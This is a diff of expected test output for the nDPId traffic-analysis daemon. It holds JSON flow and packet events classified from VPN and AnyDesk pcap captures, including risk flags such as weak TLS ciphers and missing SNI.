00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
01035{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}}
00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}

28
test/results/anydesk-2.pcap.out
View File

File diff suppressed because one or more lines are too long

28
test/results/anydesk.pcap.out
View File

@@ -1,19 +1,19 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"anydesk.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591342198821}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"}
